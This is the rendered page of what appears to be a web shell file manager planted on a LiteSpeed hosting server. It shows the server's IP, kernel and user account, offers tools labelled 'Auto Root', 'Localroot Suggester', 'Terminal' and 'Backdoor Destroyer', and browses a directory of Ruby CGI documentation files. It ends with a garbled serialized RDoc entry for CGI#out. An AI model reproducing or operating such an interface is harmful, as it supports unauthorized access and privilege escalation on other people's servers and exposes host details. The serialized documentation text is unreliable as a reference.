Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
CGI /
Delete
Unzip
Name
Size
Permission
Date
Action
Cookie
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Escape
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTML3
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTML4
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTML4Fr
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTML4Tr
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HTML5
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
HtmlExtension
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InvalidEncoding
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
QueryExtension
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Session
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Util
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
_no_crlf_check-i.ri
242
B
-rw-r--r--
2026-04-07 17:42
accept_charset%3d-c.ri
349
B
-rw-r--r--
2026-04-07 17:42
accept_charset-c.ri
336
B
-rw-r--r--
2026-04-07 17:42
accept_charset-i.ri
319
B
-rw-r--r--
2026-04-07 17:42
cdesc-CGI.ri
13.19
KB
-rw-r--r--
2026-04-07 17:42
env_table-i.ri
283
B
-rw-r--r--
2026-04-07 17:42
header-i.ri
622
B
-rw-r--r--
2026-04-07 17:42
http_header-i.ri
4.85
KB
-rw-r--r--
2026-04-07 17:42
new-c.ri
3.24
KB
-rw-r--r--
2026-04-07 17:42
out-i.ri
2.64
KB
-rw-r--r--
2026-04-07 17:42
parse-c.ri
538
B
-rw-r--r--
2026-04-07 17:42
print-i.ri
488
B
-rw-r--r--
2026-04-07 17:42
stdinput-i.ri
284
B
-rw-r--r--
2026-04-07 17:42
stdoutput-i.ri
287
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"out:ETI"CGI#out;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I":Print an HTTP header and body to $DEFAULT_OUTPUT ($>);To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@label[I"+content_type_string+;T; [o; ; [I"AIf a string is passed, it is assumed to be the content type.;To;;[I"+headers_hash+;T; [o; ; [I"EThis is a Hash of headers, similar to that used by #http_header.;To;;[I"+block+;T; [o; ; [I"IA block is required and should evaluate to the body of the response.;T@o; ; [I"J<tt>Content-Length</tt> is automatically calculated from the size of ;TI".the String returned by the content block.;T@o; ; [I"GIf <tt>ENV['REQUEST_METHOD'] == "HEAD"</tt>, then only the header ;TI"His output (the content block is still required, but it is ignored).;T@o; ; [I"IIf the charset is "iso-2022-jp" or "euc-jp" or "shift_jis" then the ;TI"Kcontent is converted to this charset, and the language is set to "ja".;T@o; ; [I" Example:;T@o:RDoc::Markup::Verbatim; [,I"cgi = CGI.new ;TI"cgi.out{ "string" } ;TI"! # Content-Type: text/html ;TI" # Content-Length: 6 ;TI" # ;TI" # string ;TI" ;TI"(cgi.out("text/plain") { "string" } ;TI"" # Content-Type: text/plain ;TI" # Content-Length: 6 ;TI" # ;TI" # string ;TI" ;TI"#cgi.out("nph" => true, ;TI"2 "status" => "OK", # == "200 OK" ;TI"5 "server" => ENV['SERVER_SOFTWARE'], ;TI"& "connection" => "close", ;TI"* "type" => "text/html", ;TI", "charset" => "iso-2022-jp", ;TI"> # Content-Type: text/html; charset=iso-2022-jp ;TI"# "language" => "ja", ;TI": "expires" => Time.now + (3600 * 24 * 30), ;TI"1 "cookie" => [cookie1, cookie2], ;TI") "my_header1" => "my_value", ;TI"6 "my_header2" => "my_value") { "string" } ;TI" # HTTP/1.1 200 OK ;TI". # Date: Sun, 15 May 2011 17:35:54 GMT ;TI" # Server: Apache 2.2.0 ;TI" # Connection: close ;TI"7 # Content-Type: text/html; charset=iso-2022-jp ;TI" # Content-Length: 6 ;TI" # Content-Language: ja ;TI"1 # Expires: Tue, 14 Jun 2011 17:35:54 GMT ;TI" # Set-Cookie: foo ;TI" # Set-Cookie: bar ;TI" # my_header1: my_value ;TI" # my_header2: my_value ;TI" # ;TI" # string;T:@format0: @fileI"lib/cgi/core.rb;T:0@omit_headings_from_table_of_contents_below0I"Dcgi.out(content_type_string='text/html') cgi.out(headers_hash) ;TI"